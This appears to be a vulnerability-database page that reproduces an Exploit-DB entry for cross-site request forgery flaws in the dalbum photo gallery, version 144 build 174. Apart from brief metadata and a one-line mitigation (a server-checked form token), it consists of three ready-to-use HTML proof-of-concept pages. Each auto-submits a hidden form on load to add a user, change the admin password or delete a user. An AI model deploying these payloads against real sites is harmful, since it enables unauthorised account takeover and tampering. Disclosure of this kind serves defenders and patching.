dalbum 144 build 174 and earlier CSRF Vulnerabilities

vendor:

dalbum

by:

Ahmed Elhady Mohamed

7,8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: dalbum

Affected Version From: 144 build 174

Affected Version To: 144 build 174

Patch Exists: NO

Related CWE: N/A

CPE: dalbum

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Ubuntu 11.4

2020

dalbum 144 build 174 and earlier CSRF Vulnerabilities

This vulnerability allows a malicious hacker to add a user, delete a user and change password of a user.

Mitigation:

Implementing a random token in the form that is checked on the server side to verify that the request is legitimate.

Source

Exploit-DB raw data:

dalbum 144 build 174 and earlier CSRF Vulnerabilities
===================================================================================
# Exploit Title:dalbum 144_174 and earlier CSRF Vulnerabilities
# Vendor: http://www.dalbum.org/
# Download link :http://www.dalbum.org/index.php?go=Downloads
# Author: Ahmed Elhady Mohamed
# Email : ahmed.elhady.mohamed@gmail.com
# version: 144 build 174
# Category: webapps
# Tested on: ubuntu 11.4 
# This vulnerability allows a malicious hacker to add a user 
  delete a user and change password of a user 
===================================================================================
CSRF VUlnerabilities :

POC 1:

	<html>
	<head>
	<title>  Add a user </title>
	<script>
		function CSRF() {
			document.getElementById('CSRF').click();
		};
	</script>
	</head>
	<body onLoad="CSRF()">
		<form action="http://127.0.0.1/photo/pass.php" method="post" />
		<input name="user" value="CSRF" type="hidden" />
		<input name="pass" value="123" type="hidden" />
		<input name="passc" value="123" type="hidden" />
		<input type="hidden" name="action" value="add">
		<input type="submit" id="CSRF" name="submit" value="Submit">
	</form>
	</body>
	</html>

POC 2:

	<html>
	<head>
	<title>  Change user's password  </title>
	<script>
		function CSRF() {
			document.getElementById('CSRF').click();
		};
	</script>
	</head>
	<body onLoad="CSRF()">
	<form action="http://127.0.0.1/photo/pass.php" method="post" />
		<input name="user" value="admin" type="hidden" />
		<input name="pass" value="111" type="hidden" />
		<input name="passc" value="111" type="hidden" />
		<input name="change" value="Change password" type="hidden" />
		<input type="hidden" name="action" value="change">
		<input type="submit" id="CSRF" name="submit" value="Submit">
	</form>
	</body>
	</html>

POC 3:

	<html>
	<head>
	<title>  Delete a user  </title>
	<script>
		function CSRF() {
			document.getElementById('CSRF').click();
		};
	</script>
	</head>
	<body onLoad="CSRF()">
	<form action="http://127.0.0.1/photo/pass.php" method="post" />
		<input name="user" value="a" type="hidden" />
		<input type="hidden" name="delete" value="Delete">
		<input type="submit" id="CSRF" name="submit" value="Submit">
	</form>
	</body>
	</html>